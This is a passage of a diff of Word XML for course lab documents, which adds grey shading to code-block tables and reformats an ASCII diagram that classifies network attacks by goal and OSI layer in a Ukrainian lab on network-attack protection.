         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -126,6 +127,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -643,6 +645,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -659,6 +662,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1202,6 +1206,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -1218,6 +1223,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1347,6 +1353,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -1363,6 +1370,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1776,6 +1784,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -1792,6 +1801,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -1919,6 +1929,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -1935,6 +1946,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2326,6 +2338,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -2342,6 +2355,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2580,6 +2594,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -2596,6 +2611,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -2802,6 +2818,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -2818,6 +2835,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3011,6 +3029,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -3027,6 +3046,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -3974,6 +3994,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -3990,6 +4011,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -4830,6 +4852,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -4846,6 +4869,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -5168,6 +5192,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -5184,6 +5209,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -5279,6 +5305,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -5295,6 +5322,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -5390,6 +5418,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -5406,6 +5435,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -5483,6 +5513,7 @@
           <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
           <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
         <w:tblLayout w:type="fixed"/>
         <w:tblCellMar>
           <w:top w:type="dxa" w:w="113"/>
@@ -5499,6 +5530,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -8620,6 +8652,7 @@
         <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
         <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
       </w:tblBorders>
+      <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
       <w:tblCellMar>
         <w:top w:type="dxa" w:w="113"/>
         <w:left w:type="dxa" w:w="113"/>

--- a/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
+++ b/public/labs/pmzi/pz-23/ЛР9_ПМЗІ_Програмні_засоби_захисту_від_мережевих_атак.docx
@@ -92,248 +92,297 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                    КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК                        │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ЗА МЕТОЮ:                                                            │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── Отримання доступу (Access attacks)                               │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── Підбір паролів (Brute force)                                 │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── Експлуатація вразливостей                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   └── Man-in-the-Middle (MITM)                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │                                                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── Відмова в обслуговуванні (DoS/DDoS)                              │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── SYN Flood                                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   ├── UDP Flood                                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │   └── Amplification attacks                                        │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │                                                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  └── Розвідка (Reconnaissance)                                        │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│      ├── Сканування портів                                            │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│      ├── Сканування вразливостей                                      │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│      └── DNS enumeration                                              │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ЗА РІВНЕМ OSI:                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── L2: ARP spoofing, MAC flooding                                   │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── L3: IP spoofing, ICMP attacks                                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ├── L4: TCP/UDP attacks, port scanning                               │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  └── L7: SQL injection, XSS, CSRF                                     │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">│                    КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК                        │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  ЗА МЕТОЮ:                                                            │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  ├── Отримання доступу (Access attacks)                               │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │   ├── Підбір паролів (Brute force)                                 │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │   ├── Експлуатація вразливостей                                    │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │   └── Man-in-the-Middle (MITM)                                     │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │                                                                    │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  ├── Відмова в обслуговуванні (DoS/DDoS)                              │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │   ├── SYN Flood                                                    │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │   ├── UDP Flood                                                    │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │   └── Amplification attacks                                        │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │                                                                    │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  └── Розвідка (Reconnaissance)                                        │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│      ├── Сканування портів                                            │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│      ├── Сканування вразливостей                                      │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│      └── DNS enumeration                                              │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  ЗА РІВНЕМ OSI:                                                       │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  ├── L2: ARP spoofing, MAC flooding                                   │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  ├── L3: IP spoofing, ICMP attacks                                    │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  ├── L4: TCP/UDP attacks, port scanning                               │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  └── L7: SQL injection, XSS, CSRF                                     │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="9"/>
     <w:bookmarkStart w:id="10" w:name="брандмауер-firewall"/>
@@ -578,176 +627,225 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">┌───────────────────────────────────────────────────────────────────────┐</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
